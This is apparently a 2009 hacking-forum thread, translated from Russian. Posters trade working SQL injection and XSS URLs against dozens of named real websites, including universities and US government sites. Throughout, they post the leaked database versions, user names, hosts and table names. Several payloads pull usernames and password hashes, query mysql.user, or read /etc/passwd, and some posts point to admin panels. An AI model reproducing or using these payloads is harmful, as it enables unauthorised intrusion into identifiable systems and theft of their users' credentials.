http://www.irs-net.de/kontakt/mitarbeiter.php?id=1+union+select+1,2,3,4,5,6,7,8, 9,0,11,12,13,14,15,unhex(hex(concat_ws(0x3a,user,p assword))),17,18,19,20,21+from+mysql.user+limit+0, 1/*
Database Version: 4.1.11-log
Database name: web
User name: root@www5.shuttle.de
Skofield
10.07.2009, 21:03
PR 5
http://www.digitallyobsessed.com/displaypr.php?ID=-608+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,version(),27,28,29 ,30,31,32,33,34,35,36+from+users--
Database Version: 5.0.81-community
Database name: bobftp_obsessed
User name: bobftp_king@localhost
http://www.belsoft.ru/index.php?cont=prices&page=a&dob=2&id=21085+limit+0+UNION+SELECT+1,2,3,4,5,6,7,CONCAT (Version(),Database(),User()),9,10,11--
Database Version: 5.0.67-log
Database name: u158438
User name: u158438@10.10.10.212
http://www.belsoft.ru/index.php?cont=prices&page=a&dob=2&id=21085+limit+0+UNION+SELECT+CONCAT((SELECT+CONCA T(converge_id,converge_pass_hash,converge_pass_sal t)+FROM+u158438.ibf_members_converge+LIMIT+2,1)),2 ,3,4,5,6,7,8,9,10,11--
admin panel
http://www.belsoft.ru/forum/admin.php
HAXTA4OK
11.07.2009, 08:36
http://ru.tv-mis.com/titul.php?id=1+and+substring(version(),1,1)=5
P.S. I'll also post an XSS
http://ru.tv-mis.com./titul.php?id=%20%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E =)
####################################
http://www.kokomansion.tv/showvideos.php?id=-1+union+select+1,concat(0x3a,user(),version(),data base()),3,4,5,6,7,8,9--
kokouser@localhost5.0.45kokomansiondb
P.S. I'll also post an XSS
http://www.kokomansion.tv/showvideos.php?id=%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E
####################################
http://www.oreol.tv/services/channel.php?id=1+and+substring(version(),1,1)=5--
Krist_ALL
11.07.2009, 13:53
http://www.gtbike.ru/articles.php?menu_id=38&razd_id=0&pg=1&id=-60+union+select+1,2,3,version(),5,6,7,8,9 PR 4
http://www.wavplanet.com/wavs.php?cat=5+union+select+1,concat(version(),dat abase(),user()),3,4,5,6,7--
4.0.17-standard-log wavplanet root@192.168.2.11
[PR 6]
http://www.dacc.edu/news/index.php?id=-503+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,94.1.21-standard:news:public@localhost
==============================
[PR 4]
http://www.laererportalen.dk/kalender.php?id=-547+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9,105.1.35:laererportal:l aererportal_u@localhost
==============================
[PR 4]
http://www.szgl.at/kalender.php?id=-28+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,64.0.23-Max-log:d00942bb:d00942bb@localhost
==============================
[PR 3]
http://www.futter-fuers-volk.de/kalender.php?id=-3+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,225.0.51a-3ubuntu5.1:usr_web68_2:web68@localhost
==============================
[PR 3]
http://www.b-b-z.nl/jubileum/kalender.php?id=-7+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,75.0.51a-3ubuntu5.4:b_b_z:b-b-z@localhost
==============================
[PR 2]
http://www.alexandra-ihrig.de/kalender.php?id=-12+union+select+concat_ws(0x3a,version(),database( ),user()),2,3,44.0.27-max-log:db196773590:dbo196773590@212.227.127.40
==============================
[PR 0]
http://neo24.sin.khk.be/phoenix/kalender.php?id=-73+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user())5.0.81-1-log:neo24:neo24@squid.srv.sin.khk.be
http://neo24.sin.khk.be/phoenix/kalender.php?id=-73+union+select+1,2,3,4,concat_ws(0x3a,username,us er_password)+from+phoenix_phpbb_usershttp://neo24.sin.khk.be/phoenix/kalender.php?id=-73+union+select+1,2,3,4,concat_ws(0x3a,username,pa ssword)+from+tbl_users
Krist_ALL
11.07.2009, 19:23
http://www.radioworld.ca/information.php?info_id=-45+union+select+1,2,3+from+admin+--
4th version
db_info:
http://snt-nmu.kiev.ua/?l=ukr&p=scientific_groups&group=-10'+union+select+1,2,3,4,concat_ws(0x0b,version(), user(),database()),6,7--+
5.0.32-Debian_7etch8
snt-nmu@localhost
snt-nmu
tables:
http://snt-nmu.kiev.ua/?l=ukr&p=scientific_groups&group=-10'+union+select+1,2,3,4,group_concat(0x0b,column_ name),6,7+from+information_schema.columns+where+ta ble_name=0x7373735f70616e656c--+
P.S.: the site is on the same server as "injector" (inj3ct0r.com)
blind
http://www.hopewell-precision.com/product.php?prod_id=5+AND+ascii(lower(substring(da tabase(),1,1)))>1
stan12187@localhost
stan121871
5.1.22-log
nemaniak
12.07.2009, 02:02
blind PR4
http://www.pollanetsquad.it/attore.asp?cod_att=2150+and+ascii(substring((conca t_ws(char(58),user(),database(),version())),1,1))>1
Sql135947@%:Sql135947_1:5.0.68-log
http://www.baltimorebrass.net/index.php?cat=5+UNION+SELECT+1,2,3,4,CONCAT(Versio n(),Database(),User()),6,7--
67-communitybaltim4_websitebaltim4_wsclient@localhost
beerhack
12.07.2009, 10:19
http://www.n-rabota.ru/resume/post.php?id=1+union+select+1,2,version(),4,5,6,7,8 ,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--
Database Version: 5.0.81
Database name: n-rabota
User name: n-rabota@localhost
http://www.winnersport.ru/main.php?s=catalog&id=-627+union+select+1,2,concat_ws(0x3a,database(),ver sion(),user()),4,5,6,7,8--
http://www.oil.se/article.php?sub=0§ion=6&id=-35+union+select+1,2,3,4,5,concat_ws(0x3a,database( ),version(),user()),7,8,9--
http://znamiarodiny.artmiem.ru/main.php?id=15+union+select+1,2,concat_ws(0x3a,dat abase(),version(),user()),4,5,6--
http://www.librasdeamor.org/help.php?IdPage=-15+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,datab ase(),version(),user()),9,10,11--
http://www.thakornkit.com/new.php?id=-1+union+select+1,2,concat_ws(0x3a,database(),versi on(),user())--
output is in the img tag
Skofield
12.07.2009, 16:01
http://www.bulletinpa.com/index.php?id=-907+union+select+1,2,3,4,5,6,7,8,9/*
blind
---------------------------------------------------------------------------------------------------------
http://travel.emeraldcoast.com/article.php?id=-175+union+select+1,version(),3,4,5,6,7,8,9,0,11,12 ,13,14,15,16,17,18,19,20,21/*
Database Version: 5.0.26-standard-log
Database name: iansawesomedb
User name: isH4X0r@cyclone.emeraldcoast.com
---------------------------------------------------------------------------------------------------------
http://www.stormbringer.at/news.php?id=-3706'+union+select+1,2,3,4,5,admin_id,7,8,9,0,11,1 2,13+from+admin/*
Database Version: 5.0.45
Database name: usr_web5_1
User name: web5@localhost
HAXTA4OK
12.07.2009, 21:23
http://www.ibnlokmat.tv/gallery.php?id=1&conid=-57082+union+select+1,2,concat_ws(0x3a,version(),us er(),database()),4,5,6,7--
5.0.27-standard-log:lokmat@172.29.11.1:ibnlokmat
####################################
http://wcha.tv/live.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9--
5.0.22-Debian_0ubuntu6.06.10-log:site_wcha_tv:wcha@64.73.77.67
####################################
http://www.tv-portal.ru/index.php?kanal=-339+union+select+1,2,concat_Ws(0x3a,database(),use r(),version()),4,5,6,7,8,9,10,11&stat-id=1
db_kokos32_2:dbu_kokos32_1@192.168.7.9:4.1.22
####################################
http://laurabenjamin.tv/video.php?id=1§ion=1+union+select+1,concat_ws(0x3a,user(),dat abase(),version()),3,4,5--
LBTV@208.109.181.196:LBTV:4.1.22-max-log
####################################
PR: 5
http://www.fabawards.tv/view-fabawards-2009show.php?id=1'+union+select+1,concat_ws(0x3a,u ser(),database(),version()),3+from+mysql.user+--+
All_DB_Admin@localhost:fabawards:5.0.83-rs
output is in the image path.. mysql.user is there... never did find the path (((
####################################
http://www.na.owns.tv/index.php?page=userprofile&id=-1'+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28+/*+
naownstv@localhost:naownstv-web:4.1.20
####################################
http://www.tv-live.ro/radio-live.php?id=-1+UnIoN+SeLeCT+concat_ws(0x3a,user(),database(),ve rsion()),2,3,4,5,6--
tvlive@localhost:tvlive_db:5.0.67-community.jpg
####################################
http://ua.tv-mis.com/titul.php?id=1+and+substring(version(),1,1)=5--
####################################
PR 3
http://www.supplyanddemand.tv/show_news.php?id=-1+union+select+1,2,concat_Ws(0x3a,database(),user( ),version()),4--
supplyd:supplyd@localhost:4.0.25
####################################
http://www.vehiclegraphics.tv/view.php?id=1'+and+substring(version(),1,1)=5+/*+
####################################
http://www.lancs.tv/index.php?PHPSESSID=urewmdaiezvwdmn&p=page&id=-1+union+select+1,2,concat_Ws(0x3a,user(),database( ),version())--
lccc-root@localhost:lancstv:5.0.51b-log
####################################
http://www.famicomdojo.tv/subscription.php?id=1+union+select+1,2,3,4,5,6,7,8 ,concat_Ws(0x3a,user(),database(),version()),10,11 ,12,13,14,15,16,17--
tfboogaloo@logic:FamicomDojo:5.0.37-standard
http://www.catan.ro/index.php?pagina=stire&id=-43+UNION+SELECT+1,2,concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),4
Database Version: 4.1.22-standard-log
Database name: catanro_catan
User name: catanro_catan@localhost
Os : pc-linux-gnu
Staratel
12.07.2009, 23:13
1) Guys, can you recommend some SQL scanner program that would crawl a site on its own, putting quotes into the variables in search of MySQL errors?
2) Also, I'd really appreciate it if you could show, with an example URL, how to properly use it in an update
To change variable values in the database from an SQL injection query.
Thanks a lot.
mssql
[PR 5]
http://www.coveredbridges.com/events/annualEvents.asp?id=1+or+1=@@version--Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
====================================
[PR 4]
http://www.anconia.com/support/faq.asp?id=1218+or+1=@@version--Microsoft SQL Server 2005 - 9.00.4207.00 (Intel X86) Dec 17 2008 14:34:38 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
====================================
[PR 6]
http://www.juristenverband.at/kalender.php?id=-137+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),database(),user()),7,8,9,10,11,12
4.0.21:juristenverband:root@localhost http://www.juristenverband.at/kalender.php?id=-137+union+select+1,2,3,4,5,concat_ws(0x3a,user,pas sword,file_priv),7,8,9,10,11,12+from+mysql.user=== =================================
[PR 3]
http://www.werkensepolder.nl/kalender.php?id=-24+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user()),5,6,74.0.15:werkense:werkense@loca lhost
====================================
[PR 2]
http://www.beitstadfjordmc.no/applic/kalender.php?id=-21+union+select+concat_ws(0x3a,version(),database( ),user())
5.0.32-Debian_7etch10-log:beitstadfjordmc:beitstadfjordmc@srv85.one.com
====================================
[PR 2]
http://www.svenarum.nu/kalender.php?id=-1011+union+select+1,2,3,4,5,concat_ws(0x3a,version (),database(),user()),7,8,95.0.27:svenarum_nu:sven arum.nu@localhost
====================================
[PR 1]
http://www.judyreynolds.com/en/kalender.php?id=-3+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,7,8,9,10,11,12,135.0.32-Debian_7etch10-log:db1073307-judy:dbu1073307@localhosthttp://www.judyreynolds.com/en/kalender.php?id=-3+union+select+1,2,3,4,concat_ws(0x3a,id,name,pass ,admin),6,7,8,9,10,11,12,13+from+user============= =======================
[PR 1]
http://www.vvvolkegem.be/kalender.php?ID=-11+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user()),6,7,8,9,10--4.1.22-standard:voevol06_volkegem:voevol06_43sj29a@localh ost
====================================
[PR 0]
http://www.donkerewolk.net/kalender.php?id=-22+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,55.0.37-standard:tarsforier_wolk:tarsforier_tf@localhostht tp://www.donkerewolk.net/kalender.php?id=-22+union+select+1,2,concat_ws(0x3a,user_id,usernam e,userpass),4,5+from+poll_user==================== ================
[PR 0]
http://www.h-lebt.de/kalender.php?id=9999999999+union+select+1,2,3,4,5, concat_ws(0x3a,version(),database(),user()),7,8,9, 10,11,12,13,14,15,16--&month=65.0.32-Debian_7etch5-log:usr_web0_1:web0@localhosthttp://www.h-lebt.de/kalender.php?id=9999999999+union+select+1,2,3,4,5, concat_ws(0x3a,username,password),7,8,9,10,11,12,1 3,14,15,16+from+be_users--&month=6
beerhack
13.07.2009, 00:47
http://provympel.ru/index3.php?id=56+union+select+1,version(),3,4--
Database Version: 5.0.81-community
Database name: magics_complex
User name: magics_tester@localhost
giant.md
These are, like, the coolest bikes in Moldova :D
http://www.giant.md/news.php?id=-17%20UNION%20SELECT%20CONCAT_WS(0x3a,DATABASE(),US ER(),VERSION()),2,3,4--
13404:13404@localhost:5.0.77
tables (columns)
gov
http://www.vidol.gov/dol_news_detail.php?detail_id=38'+union+select+1,l oad_file('/etc/passwd'),3,4+limit+1,1/*
too bad MySQL is on a different host.. =)
version 5.0.45-log
Skofield
13.07.2009, 15:44
http://www.praguepubs.co.uk/pubs_details.php?id=-3+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,0,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39+from+information_schema.tables--
5.0.77-community-log:ppubs_ppubs:ppubs_prague@localhost
beerhack
13.07.2009, 16:20
blind, version: 5
http://www.perquimanscountync.gov/index.php?page=commissioners&id=6+and+substring(version(),1,1)=5--&mode=printminutes
PR 5
http://www.stikom.edu/v8/main.php?act=lay&goto=jurnal_detil&id=-28+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5--
T74113_stikomedu:5.0.51a-24+lenny1:t74113_nuansajp@localhost
PR 5
http://www.ecodelaware.com/place.php?id=313+union+select+1,concat_ws(0x3a,use rname,password),3+from+Users--
---
http://knowyou.ru/send.php?id=-10908+union+select+1,concat_ws(0x3a,database(),ver sion(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17--
http://www.artafisha.ru/place.php?id=-15+union+select+1,2,3,4,5,concat_ws(0x3a,database( ),version(),user()),7--
http://www.gilishproekt.ru/Objects/place.php?id=-179+union+selecT+1,2,3,4,5,concat_ws(0x3a,database (),version(),user())--
http://a-sib.ru/hot.php?id=-68+union+select+1,2,3,4,concat_ws(0x3a,database(), version(),user()),6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23--
http://fanboys.dreamhosters.com/index.php?blog=-74+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8--&comic=327
PR5
www.hcjz.hr
http://www.hcjz.hr/clanak.php?id=-12521+union+select+concat_ws(0x3a,user(),version() ,database(),11111111111111111111111)/*
DB: hcjz@asc203.t-com.hr:5.0.45:hcjz
Path: /users1/hcjz/public_html/
Table: jos_users
+++AndreyDevil+++
14.07.2009, 05:04
http://www.washingtoninstitute.org/templateC05.php?CID=-2550'+union+select+1,2,3,4,5,version(),7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22--+
5.0.67-log
winep2_2@localhost
winep2_production
PR5
www.lakberendezes.hu
http://www.lakberendezes.hu/magazin/mutat.php?id=-462+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
DB: 5.0.32-Debian_7etch5-log:lakber:lakberftp@localhost
Path: /home/dv/users/lakberendezes/www/
Table: admin && users
HAXTA4OK
14.07.2009, 10:17
http://www.bacchus.tv/index/wine2.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user())--
5.0.67:bacchus_bacchus:bacchus_bacchus@localhost
####################################
http://www.toddlevi.tv/gotw_display.php?id=-1'+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8/*
5.0.27:toddlevi:toddlevi@localhost
####################################
TIC: 40
PR: 4
http://www.hypocrisy.tv/mediaplayer/videos.php?id=-1+union+select+concat_Ws(0x3a,user(),database(),ve rsion()),2,3,4,5,6,7,8,9--
penetralia@crenshaw.dreamhost.com:penetralia:5.0.6 7-userstats-log
####################################
http://philmadelphia.tv/portfolio/motion.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user())--
4.1.25-Debian_mt1:db20241_kelly:db20241@64.13.232.43
####################################
I KILLED KENNY TOO :D
http://www.southpark-tv.com/episode.php?id=1+union+select+1,2,concat_Ws(0x3a,v ersion(),database(),user()),4,5,6,7,8,9,10,11--
5.0.68-log:southparasql:southparasql@10.0.65.22
tables:
punbb_censoring,sptv_temp,punbb_groups,wa_admin,pu nbb_reports,pmnl_archives,wa_forbidden_ext,punbb_s ubscriptions,pmnl_sub,wa_log_files,sptv_referer,pu nbb_config,videos,punbb_online,wa_auth_admin,punbb _search_cache,pmnl_config,wa_joined_files,punbb_to pics,pmnl_temp,wa_session,sptv_referer_out,sptv_re ferer_site,punbb_forum_perms,wa_abo_liste,punbb_po sts,wa_ban_list,punbb_search_matches,pmnl_email,wa _liste,punbb_users,punbb_bans,sptv_referer_toplist ,punbb_forums,wa_abonnes,punbb_ranks,wa_config,pun bb_search_words,pmnl_listsconfig,wa_log,ratings,pu nbb_categories
user_tables: punbb_users :)
http://www.southpark-tv.com/episode.php?id=1+union+select+1,2,group_concat(con cat_Ws(0x3a,username,password)),4,5,6,7,8,9,10,11+ from+punbb_users--
http://www.sale-info.ru/lot.php?id=-227+union+select+1,2,3,4,5,7,8,9,10,concat_ws(0x3a ,database(),version(),user()),12,13--
u19167:5.0.67-log:u19167@10.10.153.166
http://www.region-oz.ru/home.php?id=-10+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20--
regionoz_baze:5.0.32-Debian_7etch1-log:regionoz_baze@77.221.130.9
AlexSatter
14.07.2009, 12:27
http://www.allnovgorod.ru/show-kino.php?id=-9+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19
5.0.81-community-log:allnovgo_allnovg@localhost:allnovgo_site
http://menticid.com/entertainment/kino.php?id=-54+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10
4.0.27-max-log:dbo30998491@212.227.109.166:db30998491
http://www.wathne-realty.ru/pages/house.php?id=-218+union+select+1,2,concat_ws(0x3a,database(),ver sion(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21--
http://www.mxshop.ru/goods.php?id=1437+union+select+1,2,3,4,concat_ws(0 x3a,database(),version(),user()),6,7,8+limit+1,1--
http://9984899.ru/house.php?id=-122+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws (0x3a,database(),version(),user())--
http://www.riphopkins.com/view-work.php?id=-1+union+select+1,2,3,4,5,6,7,concat(database(),0x3 a,version(),0x3a,user()),9--
http://www.macso.ru/day.php?id=14+union+select+1,2,concat_ws(0x3a,data base(),version(),user())+limit+1,1--
http://www.helpatwork.se/work.php?subpage=6&id=1+union+select+concat_ws(0x3a,database(),versio n(),user()),2--
---
mailbrush
14.07.2009, 15:51
Haven't posted here in a while...
http://bikez.com/msgboard/msg.php?id=22048+and+null+union+select+unhex(hex(c oncat_ws(0x3a,user(),database(),version()))),2,3,4&type=bikehholm@localhost:hholm:4.1.1
Pashkela
14.07.2009, 19:49
The Italian counterpart of the ][ magazine :)
http://www.hackerjournal.it/hj/index.php?name=PNphpBB2&file=index&c=1'
Could not query categorie parm SELECT * FROM nuke_phpbb_categories WHERE cat_id=1\'
http://www.hackerjournal.it/hj/index.php?name=PNphpBB2&file=index&c=1+and+substring(version(),1,1)=5
http://www.hackerjournal.it/hj/index.php?name=PNphpBB2&file=index&c=1/**/union/**/select/**/1,version(),3,4,5/**/limit/**/1,1/*
http://www.hackerjournal.it/hj/index.php?name=PNphpBB2&file=index&c=1/**/union/**/select/**/1,concat_ws(0x3a,username,user_password),3,4,5+fro m+nuke_phpbb_users/**/limit/**/2,1/*
HAXTA4OK
14.07.2009, 22:23
http://mobile.shortz-tv.com/index.php?p=cat;id=-1'+union+select+concat_ws(0x3a,user(),database(),v ersion())+--+;lng=en
ohmtv@localhost:5.0.51a-24+lenny1-log
####################################
http://www.trace.tv/emission.php?id=1'+union+select+1,concat_ws(0x3a,d atabase(),user(),version()),3,4,5,6,7,8,9,10+/*+
tracetv:tracetv@localhost:5.0.45
####################################
http://www.cinefestbrasil.com/admin2/filmes/tv.php?id=1+and+substring(version(),1,1)=5--
####################################
http://www.studio52.tv/audio_home.php?id=-1+union+select+1,2,3,4,5,6,concat_Ws(0x3a,user(),d atabase(),version()),8,9,10,11,12,13,14
moiz@70.32.76.79:studio52:5.0.37-community-nt
http://www.sportcar-center.com/ru/news.php?type=2&id=-40+union+select+1,2,3,4,concat_ws(0x3a,database(), version(),user())--
u46954:5.0.67-log:u46954@10.10.223.218
http://www.witec.de/en/company/witecnews/news.php?id=-40+union+select+1,2,concat_ws(0x3a,database(),vers ion(),user()),4,5,6--
d004aa52:5.0.45-community-log:d004aa52@localhost
Adm1n4eG
15.07.2009, 02:49
mssql
PR 4
http://www.payglobal.com/index.asp?PID=1+or+1=@@version--
Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
PR 5
http://robinzonada.ru/news/index.asp?id=123+or+1=@@version--
Microsoft SQL Server 2008 (SP1) - 10.0.2531.0 (X64) Mar 29 2009 10:11:52 Copyright (c) 1988-2008 Microsoft Corporation Web Edition (64-bit) on Windows NT 6.0 <X64> (Build 6002: Service Pack 2)
HAXTA4OK
15.07.2009, 09:50
http://www.net-tv.at/ikt_videos/show_video.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16--
5.0.75-community-log:nettvat_iktvideos:nettvat@localhost
Skofield
15.07.2009, 11:38
http://www.ufms.spb.ru/fullnews.php?id=-76+union+select+1,version(),3--
Database Version: 5.0.51a-3ubuntu5.4-log
Database name: ufms_spb_ru
User name: ufms_spb_ru@localhost
-----------------------------------------------------------------------------------------------------------
http://www.rossi-potok.ru/page.php?id=-4'+union+select+version()/*
Database Version: 4.0.17
Database name: rossip
User name: rossip@localhost
-----------------------------------------------------------------------------------------------------------
PR 5 TIC 375
http://www.teatrdoc.ru/plays.php?id=-3+union+select+1,version(),3,4,5/*
Database Version: 4.1.22
Database name: kinoteatr_td
User name: kinoteatr_mysql@194.85.92.114
http://www.southernsalestt.com/news.php?id=99999+union+select+1,concat_ws(0x3a,da tabase(),version(),user()),3,4,5,6--
southern_db1:4.1.22-standard:southern_user1@localhost
http://www.rgbinteractive.com/company/news.php?id=99999+union+select+1,2,concat_ws(0x3a, database(),version(),user()),4--
rgb:5.0.45-community-nt:rgb@localhost
Zombi ****
15.07.2009, 17:46
http://fondkadyrova.com/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17--
and I have no idea what this is; I went over it with SIPT and got no results. Can anyone help?
DezMond™
15.07.2009, 18:45
http://stroyshop.info/news/arhive.php?id_groups=44+union+select+1,2,3,4,versi on
(),6,7,8,9,10,11,12,13+/*+&typenews=1
4.1.25
http://www.detali.ru/cat/oem_NI1.asp?Serie=B14**'&Year=1999&B=-
S'+UnIon+SeLecT+1,2,user,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21+--+&E=GA16DE
InfoViewer
http://www.xenon55.ru/?did=-47+union+select+1,2,3,4,5,6,7,database
(),9,10,11,12,13,14,15,16,17,18,19,20,21,22+--
u38955
Here's more:
http://www.genoterra.ru/news/comment.php?id=-5+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,vers ion(),database(),user()),10,11,12--
http://www.harrowgatehillfuture.co.uk/gill/comment.php?ID=-5+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6--
http://www.udka.ru/comment.php?id=-999+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19--
http://www.registrazii.net/comment.php?id=-999+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
http://www.projectconversation.com/projectnostalgia/comment.php?ID=-5+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5--
http://www.bedroomconfession.com/comment.php?id=5+union+select+1,concat_ws(0x3a,ver sion(),database(),user()),3--
http://www.analisi.ru/info.php?id=-8+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4--
http://www.ambler-soft.ru/info.php?section=dsp&id=-999+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5--
HAXTA4OK
16.07.2009, 09:51
http://www.adpv.com/marketplace-tv.php?id=-1+and+1=1+UnIoN+SeLeCT+concat_ws(0x3a,version(),us er(),database()),2,3,4,5,6,7,8,9+from+mysql.user--
5.1.34-community-log:user@213.195.76.70:adpv
phpinfo:
http://www.adpv.com/phpinfo.php
mysql.user is there, and so is the path ...(( only there are no write permissions (
mailbrush
16.07.2009, 12:13
http://nadin.com.ru/hist.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5nadina@localhost:nadina_do:5.0.67-community-log
http://research.amnh.org/amcc/database/browse.php?order_id=102&phylum_id=2&class_id=4+union+select+concat_ws(char(58),user(), version())+limit+1,1--
Version: 4.1.22-log
User: www@localhost
Some kind of science site.
Pagerank: 7
TIC: 190
http://www.indstate.edu/news/news.php?newsid=-1839%20union%20select%20username,2,3,password,5,6% 20from%20newslogin%20limit%203,1/*
http://www.indstate.edu/news/login.php
Notice: Undefined index: NID in D:\Inetpub\fpseroot\news\v-modify3.php on line 114
Skofield
16.07.2009, 13:46
http://www.ateneolawjournal.com/articlemain.php?id=-131'+union+select+1,version(),3,4,5,6,7/*
Database Version: 5.0.45-log
Database name: ateneola_www
User name: ateneola@cgi0603.int.bizland.net
www.helicom.hr
PR3
blind
http://www.helicom.hr/artikl.php?id=-12488+union+select+1,2,3,4,5,6,7,8,9,unhex(hex(con cat_ws(0x3a,user(),version(),database()))),11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25+from+admin/*
DB: helicom@localhost:4.1.11-Debian_4sarge7-log:helico
Table: admin
http://www.millat.com/news.php?id=-7777+union+select+1,concat_ws(0x3a,database(),vers ion(),user()),3,4,5,6,7,8,9--
millaturdu:5.0.75:millat09@10.49.7.152
http://www.bp-rumyancevo.ru/news.php?id=-2+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4--
rumyancevo:5.0.51a:rumyancevo@localhost
ankarpoker.ru - for poker fans :)
http://ankarpoker.ru/news.php?id=-1+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6--
u181477:5.0.67-log:u181477@10.10.153.188
beerhack
16.07.2009, 17:11
PR4
http://economice.ulbsibiu.ro/rom/eStudy/profesori.php?ID=15'+union+select+1,2,version(),4, 5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22/*
Database Version: 5.0.27-log
Database name: fac_economice
User name: economice@localhost
HAXTA4OK
16.07.2009, 22:39
http://www.rs.co.th/home/tv/tv_series.php?id=1+and+substring(version(),1,1)=5--
[PR 5]
http://www.radiobanyoles.cat/noticia.php?id=-4691+union+select+1,concat_ws(0x3a,version(),datab ase(),user()),3,4,5&t=La+companyia+Yllana+torna+a+Banyoles+amb+el+seu+ darrer+espectacle+Brokers5.0.32-Debian_7etch10-log:radiobanyoles_bd:radiobanyoles@localhost
===============================
[PR 5]
http://www.aperitif-a-la-francaise.com/en/public/recettes/recette.php?id=-247+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user()),6,7,8,9,10,11,12,13,14,15,16,17 5.0.27-standard:aperitif_en:sopeuser@localhost
===============================
[PR 4]
http://www.espavino.com/spain/wine.php?id=-2257+union+select+1,2,3,4,5,concat_ws(0x3a,version (),database(),user()),7,8,9,10&wein=La%20Vi%C3%B1a5.0.45:14913_favoriten:14913_fa voriten@localhost
===============================
[PR 4]
http://modernlanguages.louisville.edu/spanish/videos_spanish/show_video.php?id=-1067+union+select+1,concat_ws(0x3a,version(),datab ase(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15&Video_Title=La%20lengua%20de%20las%20mariposas5.0. 27-standard:cml-spanish:mfmedi01@136.165.237.209http://modernlanguages.louisville.edu/spanish/videos_spanish/show_video.php?id=-1067+union+select+1,concat_ws(0x3a,id,username,pas swd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+cml.user shttp://modernlanguages.louisville.edu/spanish/videos_spanish/show_video.php?id=-1067+union+select+1,concat_ws(0x3a,id,username,pas swd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+spanish. usershttp://modernlanguages.louisville.edu/spanish/videos_spanish/show_video.php?id=-1067+union+select+1,concat_ws(0x3a,id,username,pas swd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+trinity. user===============================
[PR 3]
http://www.domaine-la-fourmone.com/bouteille2_gb.php?id=-15+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user()),5,6,7,8,9,10,11,12,13,14,15,16,175 .0.32-Debian_7etch8-log:my116691:my116691@62.193.203.175
http://www.ruig-gian.org/news/news.php?ID=-40+union+select+1,2,concat_ws(0x3a,database(),vers ion(),user()),4,5,6,7,8,9,10,11--
ruig-gianorg3:5.0.45-log:ruigadmin@localhost
